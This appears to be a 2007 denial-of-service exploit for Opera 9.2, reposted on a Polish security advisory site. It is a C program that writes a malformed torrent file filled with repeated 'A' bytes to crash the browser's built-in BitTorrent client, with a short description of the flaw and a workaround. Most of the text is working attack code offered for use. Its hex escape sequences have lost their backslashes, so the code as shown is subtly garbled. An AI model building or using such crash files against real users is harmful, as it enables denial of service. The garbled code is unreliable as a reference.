Opera 9.2 (torrent File) Remote Denial of Service Exploit

Kod :

/************************************************************************

* Created Date :April 23 2007
*
* Credits go to n00b for finding this vulnerability and writing p0c.
* Moderator of http://igniteds.net
*
* 0pera 9.2 torrent file remote dos exploit.
*
* opera has its own bit torrent client with-in the web browser
* it is possible to crash opera with a malformed torrent file
* causing denial of service to legitimate users..Opera will
* use 100% cpu till the inevitable happens..Which will be a crash
* To fix this problem disable the bitorrent with in opera..
*
* Tested : win xp service pack 1 and 2
*
* I wasn't able to catch any debugging info I'm afraid maybe some one
* else can give it a go.
*
* All i was able to get from drwatson pmsl was.
************************************************************************

* Application exception occurred:
* App: C:Program FilesOperaOpera.exe (pid=1084)
* When: 4/22/2007 @ 14:55:29.296
* Exception number: 80000003 (hard coded breakpoint)
************************************************************************

* Seams like some sort of memory leak with the bitorrent client
* of opera..
************************************************************************

********************************
**/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

char header[] = "x64x38";

char My_buff[] =
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41";

char trailing_buff[] =
"x36x31x3ax09x44x69x65x20x6fx70x65x72x61"
"x20x79x6fx75x20x73x6cx75x74";

int main(int argc,char* argv[])
{
system("cls");

printf("n *************************************************");
printf("n * Opera torrent file dos exploit by n00b *");
printf("n *************************************************");
printf("n * Shouts to every one at milw0rm *");
printf("n *************************************************");
printf("n * Special thanks to str0ke *");
printf("n * *");
printf("n * Date :Aprill 23 2007 *");
printf("n *************************************************");
printf("n * CREDITS TO n00b FOR FINDING THIS BUG *");
printf("n *************************************************");

if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("nFuck some thing went wrong :D");
exit(1);
}

printf("nnMaking torrent file...");

fwrite(header,1,sizeof(header),f);

fwrite(My_buff,1,sizeof(My_buff),f);

fwrite(trailing_buff,1,sizeof(trailing_buff),f);

printf("nDone hoooooha!");
printf("n ");
printf("n0h noes memory leak pmsl !!");
return 0;
}

void usage(char* file)
{

printf("nnusage: n00b.exe opera.torrent");
exit(1);
}

Bezpieczeństwo informacji

Wiadomości IT

Dodaj wiadomość

Szukaj

Baza SecurityAlert

O SecurityAlert

Baza ExploitAlert

Badania SecurityReason

Baza WLB

Dodaj Note WLB

O WLB

Informacje

Harmonogram

Cena

Referencje

Kontakt

Wiadomości

SecurityAlert

ExploitAlert

Apache

PHP

WLB

Kontakt

Informacje o firmie

Apache 1.3.41 mod_proxy
Integer overflow (code
execution)

Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

PHP 5.2.12/5.3.1 Multiple
Vulnerabilities

PHP 5.2.11 libgd multiple
vulnerabilities

PHP 5.2.11 tempnam()
safe_mode bypass